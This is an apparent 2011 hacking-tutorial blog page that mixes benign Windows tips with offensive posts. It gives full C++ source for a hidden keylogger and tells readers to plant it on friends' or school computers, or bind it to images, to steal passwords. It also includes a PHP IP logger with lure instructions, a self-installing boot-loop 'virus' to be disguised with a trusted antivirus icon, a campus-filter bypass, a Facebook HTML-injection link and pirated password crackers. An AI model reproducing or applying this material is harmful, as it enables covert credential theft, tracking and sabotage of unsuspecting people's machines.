Saturday, August 20, 2011

Learn To create Keylogger using C++|Basic Hacking Tutorials

Hi friends, the most interesting part  of the hacking is spying.  Today i am going to introduce to the C++ Spyware code.   It is going to be very fun.  You can install this spyware in your college/school  or in your friend system, and get their username and passwords.  This is very simple hacking trick when compared to phishing web page.







Disadvantage of Phishing Web page:

you have to upload phishing web page to web hosting.  But only few website won't detect the phishing webpage.

website url is different. Easy to detect that we are hacking.



Advantage of Spyware-keylogger:

Very simple and easy method.

Victim can't detect that we are hacking.



How to create Keylogger using Visual C++?

Requirements:

Dev C++.  Download it from here: http://www.bloodshed.net/

Knowledge about Visual C++(need, if you are going to develop the code).



Install dev C++ in your system and open the dev C++ compiler.

Go to File->New->Source File.

you can see a blank works space will be there in window.

now copy the below keylogger code into the blank work space.

#include <iostream>

using namespace std;

#include <windows.h>

#include <winuser.h>

int Save (int key_stroke, char *file);

void Stealth();



int main()

{

Stealth();

char i;



while (1)

{

for(i = 8; i <= 190; i++)

{

if (GetAsyncKeyState(i) == -32767)

Save (i,"LOG.txt");

}

}

system ("PAUSE");

return 0;

}



/* *********************************** */



int Save (int key_stroke, char *file)

{

if ( (key_stroke == 1) || (key_stroke == 2) )

return 0;



FILE *OUTPUT_FILE;

OUTPUT_FILE = fopen(file, "a+");



cout << key_stroke << endl;



if (key_stroke == 8)

fprintf(OUTPUT_FILE, "%s", "[BACKSPACE]");

else if (key_stroke == 13)

fprintf(OUTPUT_FILE, "%s", "\n");

else if (key_stroke == 32)

fprintf(OUTPUT_FILE, "%s", " ");

else if (key_stroke == VK_TAB)

fprintf(OUTPUT_FILE, "%s", "[TAB]");

else if (key_stroke == VK_SHIFT)

fprintf(OUTPUT_FILE, "%s", "[SHIFT]");

else if (key_stroke == VK_CONTROL)

fprintf(OUTPUT_FILE, "%s", "[CONTROL]");

else if (key_stroke == VK_ESCAPE)

fprintf(OUTPUT_FILE, "%s", "[ESCAPE]");

else if (key_stroke == VK_END)

fprintf(OUTPUT_FILE, "%s", "[END]");

else if (key_stroke == VK_HOME)

fprintf(OUTPUT_FILE, "%s", "[HOME]");

else if (key_stroke == VK_LEFT)

fprintf(OUTPUT_FILE, "%s", "[LEFT]");

else if (key_stroke == VK_UP)

fprintf(OUTPUT_FILE, "%s", "[UP]");

else if (key_stroke == VK_RIGHT)

fprintf(OUTPUT_FILE, "%s", "[RIGHT]");

else if (key_stroke == VK_DOWN)

fprintf(OUTPUT_FILE, "%s", "[DOWN]");

else if (key_stroke == 190 || key_stroke == 110)

fprintf(OUTPUT_FILE, "%s", ".");

else

fprintf(OUTPUT_FILE, "%s", &key_stroke);



fclose (OUTPUT_FILE);

return 0;

}



/* *********************************** */



void Stealth()

{

HWND Stealth;

AllocConsole();

Stealth = FindWindowA("ConsoleWindowClass", NULL);

ShowWindow(Stealth,0);

}



Compile the Code(Ctrl+F9)





Now execute the program by selecting Execute->Run(ctrl+F10)



now your keylogger will run in your system. whatever you type using keyboard. It will be stored in Log.txt file.

you can see the log.txt file where you save the file.







bind the exe file with image or any files and send it to your friend.

(0r)

if you have physical access to your college/school system,then copy the exe file in that system and run it.



For now, i just give simple keylogger. Soon i will post most efficient keylogger's program code.





How to Send Data on a Right Click to Your Desired Folder?

 

Whenever you attach a removable disk and want to send some items in it, you have option either you select the required files and do a CTRL –C, open the removable disk and do a CTRL-V or you select the required files right click on it and there you find “Send To” option. In “Send To” you find the name of removable disk and you simply send the items into it. Well, What if i get the name of my own desired folder there which I use frequently for keeping my stuff.

 

Now in this post I will be telling you how you can create your own folder with in any name in “Send To” option so that whenever you will copy any files or folders, you will simply send them to your folder instead of using CTRL-C and CTRL-V.

 

1) Firstly you’ll have to access hidden files. So change your view settings to make all hidden files visible.

Tools -> folder options -> view (tab) and select the show hidden files and folders.

 

2) In Windows 7 also you will have to unmark “hide system protected files and folder”. After that you can see all the hidden system protection file, now go to

C:\Users\UserName\SendTo folder.

 

3) Open up my computer and locate your most used folders let us take “Fun”. Create a shortcut of the most used folders (Fun) in

C:\Users\UserName\SendTo folder.

 

4) You can do this in a number of ways.

Right click -> send to desktop (create shortcut) and move the shortcut from the desktop to the C:\Users\UserName\SendTo folder.

Copy the most used folder and go to C:\Users\UserName\SendTo folder and right click -> paste shortcut.

 

5) Now your customized “Send To” option is ready to go.

 

Share this post with your friends if you liked this post .

 

How to log IP of Victim using Web page? Ip Logger[Method 1]

So far, i have give some third party websites to track ip address of victim.  Today we are going to create our own website or webpage to track victim IP address.  I have written this PHP code for you.



Let me explain in two different methods

Method 1:

Log ip and redirect to some other interesting webpage(like "cute kittens pictures" page) or trusted page (like "facebook" page).



Method 2:

Log the ip and remains in same page( without redirection). I think "you won't select this method.



In this post , i will explain the method 1.







Requirements:

  • Any free hosting site and basic knowledge about file uploading to hosting.
  • url shortening sites account like co.cc,co.nr[optional]


Method 1-IP log php code: 

Step 1:

Create account in any free web hosting service.



Step 2:

Open notepad++ or notepad (if you have notepadd++, it will better to edit).

Paste the following code:

<?php
header("Location:index1.php");

$file="iplog.txt";

$f=fopen($file,'a');

fwrite($f,"-------------------------"."\n");

fwrite($f,"IP Address:".$_SERVER['REMOTE_ADDR']."\n");

fwrite($f,"User Agemt:".$_SERVER['HTTP_USER_AGENT']."\n");

fwrite($f,"Host Name:".php_uname('n')."\n");

fwrite($f,"Operating System:".php_uname('v')."(".php_uname('s').")"."\n");

fclose($f);

//provided by Amazingtricks4u.co.cc

?>


and save it as index.php



Code Explanation:

If you don't want to know how it is logging the IP, you can skip to the step 3.



header("Location:index1.php"); this will redirect to index1.php page.

 You can specify any other location instead.  For example, if you want to redirect to www.interestingwebsite.com ,then change the code as

header("Location: http://www.interestingwebsite.com");

or

header("Location: http://www.interestingwebsite.com/post.php");

 

$f=fopen($file,'a');  opens the file iplog.txt in append mode( add the contents at the end of file)and store the pointer in variable f.



fwrite($f,string) will write the string into the file(iplog.txt) for example, if the string is "hello", it will be stored inside iplog.txt file.



so fwrite($f,"-------------------------"."\n"); will insert ----------- inside the iplog.txt



fwrite($f,"IP Address:".$_SERVER['REMOTE_ADDR']."\n");

here $_SERVER['REMOTE_ADDR'] is build function ,returns IP address(if you run locally in your pc using wamp/xampp, it will return 127.0.0.1). So after ---------- lines, the "Ip address:127.0.0.1" will be append.



Now the iplog.txt file contains:

--------------------

IP Address: 127.0.0.1
$_SERVER['HTTP_USER_AGENT'] returns the current user agent used by victim.  It will contains information about the browser details(mozilla 3.6,ie),operating system(xp,linux).



php_uname('n') returns the Host name .  Now the iplog.txt contains



--------------------

IP Address: 127.0.0.1

User Agent: Mozilla (linux) (ubuntu 11.10) Mozilla3.6

HostName: xxxx.limestonenetwork.com


fclose($f); will close the opened file.



Step 3:

Open notepad and save the file as "iplog.txt"



Step 4:

again open the notepad and create your own php or html page. It should be some interesting contents(download any website templates,rename the index.html file to index1.html).

Example 1(html):

<html>

<body>

<img src="cutekittens.jpg"/>

</body>

</html>
save the file as index1.html.

Example 2(php):

<html>

<head>

<title><?php echo "Cute kittens"; ?></title>

</head>

 <body>

 <img src="cutekittens.jpg"/>

</body>

</html>
 save the file as index1.php





Step 5:

Now you have 3 files namely index.php,index1.php,iplog.txt.

Upload these files to your hosting.

File uploaded to hosting account
set iplog.txt permisson to read and write by global.



Set file permission for iplog.txt


Step 4:

Check whether it is working or not by visiting the your hosting sub domain account.

For example:

http://uraccount.hosting.com/index.php

if you enter the url, it will redirect from index.php to index1.php.

Now open the iplog.txt.  There you can see the logged information.



Step 5:

Send to your friend or victim with attractive mail content and title. At the end, ask him to visit the link to know more about the info.







Redirected to index1.php





Logged Details ,stored in iplog.txt file



Once he visit the link, his IP address is in your hands.

How to Setup your own Proxy Server For Free using Hamachi and Privoxy?

Read this post to know  What is proxy server?


Why should i use Proxy server?




Open Wi-Fi Connections:

It is possible for anyone to monitor everything you do on an Open Wi-Fi Network. Not all sites that you visit may use HTTPS Encryption. Sometimes even sites that do use HTTPS only do so for certain actions and then revert to regular unencrypted HTTP connections, which are visible by anyone on the network. Using a proxy server will direct all web traffic through a secure and encrypted tunnel making all of your browsing safe and unseeable.





Bypass Firewalls and Corporate Web Filtering:

Users who wish to bypass web monitoring and restrictions imposed by their employer may utilize Proxy Servers. This is great for users and dangerous for IT Professionals as it may pose a danger to network security.



How to Set up the proxy server using Hamachi and Privoxy? 

Requirements:

  1. 2 computers. One works proxy server. Other one use the proxy server(client). Both system should have Internet connection.
  2. Hamachi: A free (for non-commercial use), cross-platform VPN service that, gives you secure access to your home network no matter where you are. Download it from here:
    https://secure.logmein.com/products/hamachi2/
  3. Privoxy: A free, Privoxy is a non-caching web proxy with advanced filtering capabilities for enhancing privacy, modifying web page data and HTTP headers, controlling access, and removing ads and other obnoxious Internet junk. Privoxy has a flexible configuration and can be customized to suit individual needs and tastes. It has application for both stand-alone systems and multi-user networks. Download it from here:

    http://www.privoxy.org/
Installing Hamachi and Set up the Server

Step 1: 
 Decide which Computer is going to work as Proxy Server.  Install the Hamachi in that computer.

Step 2:

Once you installed, run the application.  It will open small Hamachi application window with thanks message.



Step 3:

Click the Power Button.  It will automatically detect the host name and ask you to register the client.



Once you registered, it will show some IP address like 5.xx.xxx.xxx near to the power button.  Note this is our proxy ip Address.



Step 4:
Now you will get two options. 1. Create New Network 2.Join an existing Network.

This is server Computer, we have to create network to used by client.

So click the Create a New Network button.



Step 5:
It will ask you to enter network id and password(i entered id as proxy_BreakTheSecurity).   Enter your desire id and password(Should be strong password).

Click the Create button.



That's all your server is ready to be used.



Using Our Proxy Server in client Side

Now move to your client system( i mean any other computer).  Install Hamachi in your that system.

Follow the first three step mentioned above.

Step 4:

Now you will get two options. 1. Create New Network 2.Join an existing Network.

This is Client System, right? so Click the Join an Existing network.





Step 5:

Enter the Network id and password that you used to create network.  (in my case, network id i entered is proxy_BreakTheSecurity)



You can rinse and repeat this on every machine you want to do this with, for up to 16 clients (that’s the limit for Hamachi’s free-for-non-commercial-use version)



Installing the Privoxy in the client system:

Install the privoxy and run.

Step 1:
In system tray, you can see P icon. right click on the P

and select Edit->Main Configuration.





Step 2:
It will open the config.txt file in notepad.

Search for the "listen-address 127.0.0.1:8118"

Replace the 127.0.0.1 with our proxy ip address(address that displayed in server hamachi apps) created in server side.

For example listent-address 5.xx.xxx.xxx:8118

Save the file.





That's all you finished.  Restart the privoxy.

Now we have to use the Proxy server.



Set Up Your Web Browser to Use Your New Secure Proxy:
Open the Mozilla Firefox

Open Tools->Preferences.

It will open the preference window of Firefox.

Select Advanced->Network tab.

Click the Settings button near to the "Configure how Firefox connects to the Internet”

Select the Manual proxy configuration.

Enter our Server Proxy Address(5.xx.xxx.xx) and port as 8118.

click ok.







Test the Proxy Server.

Now we have to test whether our proxy is working or not.



Visit http://config.privoxy.org/. It will detect whether you use proxy or not.



If proxy is used, you’ll see a message like “This is Privoxy 3.0.17 on Windows (5.xxx.xxx.xx), port 8118, enabled.”



If not, you’ll see a page that reads “Privoxy is not being used”.





Also, if you’re on a public Wi-Fi connection and you navigate to something like WhatIsMyIP.com with your proxy turned off, you should see a different IP when you reload the page with your proxy turned on.

(Essentially, when turned on, your home’s public IP address should be showing.)



Even though your proxy is running over an HTTP connection, Hamachi is encrypting everything that runs between your computers, so it’s still a secure option

How the Proxy servers working ? How it hides our IP Address.

You know that Proxy Servers is able to hide your IP address.   But you may not know what is the process of Server and How it hides the IP address.  This Post will explain it in details.



When we visit website using Proxy Server ,the request is send to Proxy server first.  Then from Proxy server the request will be send to the original Server.    So  The Sever assumes  that  request come from IP address of Proxy server.





Thus a proxy server hides our identity by acting as an intermediary between us and the web server that we are accessing. Suppose we break into a server using a proxy server thinking that we are anonymous. But what if owner of web server starts enquiring about the clients connecting to it using the proxy server  and it is possible that owners of proxy server might  reveal our identity. This means we cant actually rely on proxy servers for being anonymous online.



THE ONION ROUTING (TOR):

 Here comes the concept of THE ONION ROUTING (TOR) into picture. By using this , the client traffic is supposed to be passed from three different servers or nodes before reaching to actual web server. It may randomly take any path through any three nodes.







Lets consider it has taken path shown by green arrows. Now



* Node 1 knows only actual origin(client) but not actual destinantion(web server).

*Node 5 neither knows actual origin nor actual destinantion.

*Node 9 knows actual destination but not actual origin.



Thus no one exactly knows which client is accessing which web server. So it is highly anonymous.


How to Install Teamviewer -Backtrack Tutorials and Tricks

Backtrack has all required tools for PenTesting. you can install Teamview in Backtrack also.



Teamviewer:

Teamviewer is legal Remote Administration Tool[RAT].  Using Teamview you can control  your friend's system from your computer.

Visit Teamviewer official site:

http://www.teamviewer.com/en/download/index.aspx

Download .deb file

Copy it to desktop.

Open the Terminal

and type the following command:

sudo dpkg -i /root/teamviewer_linux.deb

It will install the Team viewer. Enjoy.



Having doubts? Feel free to comment. 

Friday, August 19, 2011

Facebook Button Hacking Trick

You can share a html button in walls as a statuts.  Can you believe it?  This hacking trick found by Rohit Khatri.



  • Login to Your Facebook Account.
  • Copy the following code and paste in the Address bar:


https://www.facebook.com/dialog/feed?app_id=209403259107231&redirect_uri=https%3A%2F%2Fwww..facebook.com&message&link=http%3A%2F%2Fwww.amazingtricks4u.co.cc%2F&name=<center><button>Visit+:+AmazingTricks4u.co.cc<%2Fbutton><%2Fcenter>
Press the share button now.  Now visit your profile page, you can see the button.  You can also share it with your friends.



you can change

 www.amazingtricks4u.co.cc with your address.

AmazingHackingTricks is button display name.

Don't change 20940325910723.  This is application id.



These are some urls with modified code:

a. http://goo.gl/6yZPr

b. http://tinyurl.com/3thplca

c. http://goo.gl/3NgWY (with music)



Credits:Rohit Khatri


Wednesday, August 17, 2011

How to block or Disable Autorun.inf file in windows xp,Windows 7-Registry Edit


Depending on the version of Windows that you are using, there are different updates that you must have installed to correctly disable the Autorun functionality:

To disable the Autorun functionality in Windows XP, in Windows Server 2003, or in Windows 2000, you must have security update 950582, update 967715, or update 953252 installed.


Simple way to disable autorun.inf :

Follow this link and download the msi file:

http://go.microsoft.com/?linkid=9741395


Fix it yourself-Manually disabling the autorun feature:

To disable Autorun yourself on operating systems that do not include Gpedit.msc, follow these steps:

Click Start, click Run, type regedit in the Open box, and then click OK.

Locate and then click the following entry in the registry:

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\NoDrive


TypeAutorun

Right-click NoDriveTypeAutoRun, and then click Modify.

In the Value data box, type 0xFF to disable all types of drives. Or, to selectively disable specific drives, use a different value as described in the "How to selectively disable specific Autorun features" section.

Click OK, and then exit Registry Editor.

Restart the computer.



you can re-enable the autorun feature :

Follow this link:

http://go.microsoft.com/?linkid=9743275


Actually i get this information from here:

http://support.microsoft.com/kb/967715
if you want more information  or want to disable in vista, just visit the above link

Saturday, August 13, 2011

Creating a Virus to Restart the Computer at Every Startup

Today I will show you how to create a virus that restarts the computer upon every startup.That is, upon infection, the computer will get restarted every time the system is booted.This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.
For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations.And one more thing,none of the antivirus softwares detect’s this as a virus.I have coded this virus in C.So if you are familiar with C language then it’s too easy to understand the logic behind the coding.
Here is the source code.
COMMENTS ARE GIVEN AFTER THIS "//".
Compiling The Scource Code Into Executable Virus.



1. Download the Source Code Here

2. The downloaded file will be Sysres.C

3. Compile it in any 32-Bit compiler (Borland C++ 5.5 or higher is recommended)

4. The resulting .exe file is a virus and once you execute it will infect the system.
Testing And Removing The Virus From Your PC



You can compile and test this virus on your own PC without any fear.To test, just doubleclick the sysres.exe file and restart the system manually.Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.

It will not do any harm apart from automatically restarting your system.After testing it, you can remove the virus by the following steps.
1. Reboot your computer in the SAFE MODE

2. Goto X:\Windows\System (X can be C,D,E or F)

3.You will find a file by name sysres.exe, delete it.

4.Type regedit in run.You will goto registry editor.Here navigate to

HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run

There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully.
Logic Behind The Working Of The Virus



If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete.So I’ll explain the logic in a simplified manner.Here I’ll not explain the technical details of the program.If you have further doubts please pass comments.
LOGIC:

1. First the virus will find the Root partition (Partition on which Windows is installed).

2. Next it will determine whether the Virus file is already copied(Already infected) intoX:\Windows\System

3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup.

4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.
This process is repeated every time the PC is restarted.
NOTE: The system will not be restarted as soon as you double click the Sysres.exefile.The restarting process will occur from the next boot of the system.
AND ONE MORE THING BEFORE YOU LEAVE(This Step is optional)
After you compile, the Sysres.exe file that you get will have a default icon.So if you send this file to your friends they may not click on it since it has a default ICON.So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.
For example you can change the .exe file’s icon into Norton antivirus ICON itself so that the people seeing this file beleives that it is Norton antivirus. Or you can change it’s ICON into the ICON of any popular and trusted programs so that people will definitely click on it.
Monday, August 8, 2011

How to Hack Cyberoam to Access all blocked sites in college/firm

Hello Frens I am back with another hacking tutorial . This time I will explain you all " How to Hack or Unblock cyberoam to access all blocked sites in college or company" . Tutorial will be noob friendly as everything is explained with the help of snapshots...So to know How to hack cyberoam Read On....



First of all Guys You Must Know What is Cyberoam and What Idea it uses to block the user.







What is Cyberoam :





Cyberoam is Identity-based unified threat management appliances, offer comprehensive threat protection with firewall-VPN, anti-virus, anti-spam, intrusion prevention system, content filtering in addition to bandwidth management and multiple link load balancing and gateway failover.

Identity-based controls and visibility are critical components of network security. With identity and network data combined, enterprises are able to identify patterns of behavior by specific users or groups that can signify misuse, unauthorized intrusions, or malicious attacks from inside or outside the enterprise. Activities and security policy rules can be enforced on network segments based on identity.



THINGS THAT WE NEED TO HACK CYBEROAM??

1.FootPrint IP . (Our Ip that is being footprinted or traced by any website that we visit. In short NAT outside local IP).



2. An Open PORT generally its 3128. (3128 port is active port which is always open If your computer has Network assessiblity.)



3. Proxifer and Its Settings. (any Version after 2.17).



Now that's the only things that we need If we want to hack or bypass the cyberoam Client. Now Detailed Hack Is below...





HACKING CYBEROAM (DETAILED HACK)

Stepwise Description:

1. First of all We need to get the FootPrint IP . Simple Method to Get FootPrint IP.

2. Open Your Mozilla Firefox Web Browser And type the Following Site.

      https://your-freedom.de

3. When you Open the Site you will see something like this:





Click On I understand the risk (THIS IS TO ACCEPT SSL CERTIFICATE)









Click on Add Exception









CLICK ON CONFIRM SECURITY CERTIFICATE.









4. Now Guys We have Got the Footprint IP.  Next thing is that We Neeed PORT for Accessing It.

USE PORT 3128 as Its open by default on system which have aceess to Internet.



5. NOW DOWNLOAD THE FOLLOWING SOFTWARE  (PROXIFIER)



http://www.mediafire.com/?qnmczoxojjw





6. Its a Portable version of Proxifier . So need Not To Install. Just Click on It And Extract Anywhere you want. I prefer In Pen Drive.





7. After that You will Get Some Files LIKE THIS and CLICK ON PROXIFER TO RUN IT.





8. Now see the Task Bar. You will See something Like This. Clcik on that.





9. CLICK ON OPTIONS AND THEN ON ROXY SETTINGS.





10. NOW TO THE FOLLOWING SETTINGS AS SHOWN:





11. Now do the Settings as Shown Below. and Click Ok.





12. Now CLICK OK . AND OPEN THE WEBSITE YOU WANT:







NOW THATS ALL OVER THE FULL TUTORIAL.  HOPE YOU WILL ENJOY IT ..



ALL QUESTIONS ARE WELCOMED.. IF YOU HAVE ANY QUERY ASK ME I WILL HELP YOU.





SPECIAL SETTINGS FOR STUDENTS :





HEY FRENS THIS FOR YOU : 

YOU NEED NOT TO FIND FOOTPRINT IP I HAVE ALREADY DONE FOR YOU.

IN the Proxy setting Enter the Following:

Address : 210.212.76.241     Port :3128

And select HTTPS PROTOCOL.   And then CLICK on OK...



AND THEN OPEN ANY WEBSITE YOU WANT...





DON'T FORGET TO SAY THANKS !

Make your Own Text to Talk Software in Windows XP

Hello here I will Show You How to make the talking software in Windows Xp... Here we will utilize the default voices of Xp. Using this software you can make Windows to Speak the Words that you type..So Guys Read On..





Steps:

1. Open the Notepad File and Copy the Text Given Below..



Dim msg, sapi
 
msg=InputBox("Enter your text","My Talking Software")
 
Set sapi=CreateObject("sapi.spvoice")
 
sapi.Speak msg








2. Now Save the File as anyname.vbs (note that vbs Extension).





3.Now Open the anyname .vbs  file and Write the Text that you want that Xp will speak...







4. Click on Ok and See that your Xp is Spaeking the Text...



Enjoy and Have Fun!

Extreme Hack - Install Windows Xp in 10 minutes

Hey Guys This Time I come Up With another Extreme Hack That You Will Never Imagine But Its Truth and We have Done It. This Time I will explain How to Install Windows In Just 10 minutes??

As We all know that During Formatting a Computer After the File Copying is Completed then windows Require 39 Minutes Time...But What Extreme In It.... Yes We can Bypass this fking Time .... How TO DO IT??? So read On..

I have Included Snaps That will help you all....



INSTALLING XP IN 10 MINUTES!

STEP1 : After the Copy Part is Over ... System is Rebooted as we all know In general Foramatting Procedure...

Now After Reboot The Below Image Will Appear....









STEP 2: Now As This Image APPEARS You Have to Press  "Shift + F10 "  . This Will Open The command Prompt...  Now type  taskmgr  in it. This will open the Task manager .



STEP 3 : After The task Manager Opens Goto Processes ... And Find "Setup.exe"  process and Right CLICK on It.... and set the Priority to Highest....



























STEP 4: Now Just Watch the Set It will take around 9 minutes and 2 minutes for Tolerance(depends System to system)....



Thats the Overall Tutorial...Hope You all Have LIKED IT...



So When you Format your PC Next Time It will Really Save Your TIME i.e around 20 to 25 minutes...



COMMENTS PLEASE !

Best Password Hacking Breaking Tools 2011 Link Updated

Hello Friends , Today I am sharing with you my latest Collection of "Best Password Hacking Tools 2011". Using this password hacking kit you will be able to crack a lot of passwords like Windows Admin password, pdf passwords, zip files passwords, document passwords, rar passwords and much more.. I am sure you will like this post.



best hacking tools, password crackers, password hacking softwares




This Password Hacking Kit Consists of following Password Hacking Breaking Tools:
1. PDF Password Remover
2. Windows XP Admin Password Remover
3. Zip File Password Cracker.
4. SQL Password Remover
5. Microsoft Office Password Remover.
6. Microsoft Windows Vista Password Remover.
7. Rar File Password Cracker
8. Windows Password Recovery Kit
9. Password Changer.
10. Distributed File Password Recovery..
and much more..


As the name of the tools suggests its a complete password hacking Kit. So guys Enjoy Latest Hacking tools ..


How to Use it??
1. Download the Password Hacking Kit From Below:


2. Extract the file and Install it.

3. Then Register them and use it. ( all tools contains Full serial keys and patches)...



Happy Hacking Friends, I hope You all Like my post. If you have any Queries Please Comment. By Rohit Khatri 

Saturday, August 6, 2011

Remove Write Protection On USB Pen Drive or Memory Card or iPod

In the past we had received so many problems from the readers who have a problem in copying files on their USB portable devices like pen drives, memory card and iPod etc.

usb-drive-write-protected

According to the mails we had received about this problem, people have seen the following errors when their thumbs drives, memory card etc becomes write protected.

  • Cannot copy files and folders, drive is write protected
  • Cannot format the drive, drive is write protected
  • The disk is write protected
  • Remove write protection or use another disk
  • Media is write protected

Some times people say that suddenly their drive become write protected and they are not able to delete any files and folder on the drive and also not able to copy new files and folder to USB portable drive.

Let’s see how can you remove write protection on your portable devices like pen drives, memory cards, iPod and other USB mass storage devices.

Fix:

Write Protection on any portable USB Device can be applied by the physical lock provided on the card adjuster or some times provided on the pen drives, so make sure to make your drive not write protected by moving the lock in right direction.

But even after moving the physical lock for write protection the problem can happen due to some virus action. This happens when some virus or script which applies the registry hack to make any drive write protect when connected to the computer, In that case follow the procedure below to remove write protection from your pen drive.

1. Open Start Menu >> Run, type regedit and press Enter, this will open the registry editor.

2. Navigate to the following path:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies

Note: If the registry key StorageDevicePolicies key does not exist, you will need to create it

Download this batch file called add.bat from here, and double click after download the key will be automatically added to registry.

write-protection-registry

3. Double click the key WriteProtect in the right pane and set the value to 0 in the Value Data Box and press OK button

disable-write-protection

 p>

4. Exit Registry, restart your computer and then again re-connect your USB pen drive on your computer. That is it, done.

In case you still find an issue, please leave a comment below.

 

Updated on 28th May 2009

After a lot of user comments telling that the above method does not work for them, we tell you another method which you can follow to solve the “Pen Drive is Write Protected” problem.

If the above method does not work for you, follow the below steps:

1. Copy all the important data from this drive to your computer because this method will format the drive and erase all the data on the pen drive.

2. Now download the Apacer Formatting Utility, Unzip this utility to a folder on your hard disk, preferably on a folder on desktop screen for easy access (Do Not Try To Save it on pen drive). Keep your pen drive plugged in, and double click on the Start.bat file in the folder where you unzipped the above utility. This will start formatting your pen drive, wait till the formatting completes and the LED on your pen drive stops blinking. Remove your pen drive after than and plug it in again.

The above two steps will solve the problem. If you still face the problem, follow the below steps:

1. Goto Start > Run, type cmd and press enter, this will open command prompt.

2. Type the following command on the command prompt replacing X with the drive letter of your pen drive.

CHKDSK X: /F

The above two methods will help you fix the problem.

Best Mobile Call Recording Softwares(7+ softwares)







Mobile Call Recorders

8 Call Recorders For Nokia (No-Beep) | SIZE 7.5MB 



Here is the best ever Call-Recorders for Nokia Symbian S60 3rd and 5th Edition Devices, for the Help of All the Visitor's who need a No-Beep and a Wonderful Call Recording Software.You can choose from a variety of Softwares.



CONTENTS:

1-Ultimate Portable Ultimate Voice Recorder v5.05

2-Ultimate Portable Ultimate Voice Recorder v5.75

3-Ultimate Portable Ultimate Voice Recorder v6.01

4-Ultimate Voice Recorder v6.1.1

5-Smartphoneware Best Call Recorder v1.04

6-Rock Your Mobile Call Recorder Pro v1.10

7-HongDi Tech DuDuN Recorder v4.30

8-Psiloc VoxTrack Personal v1.0






DOWNLOAD:

HOTFILE





ENJOY AND HAVE FUN!

Updates Via E-Mail

Labels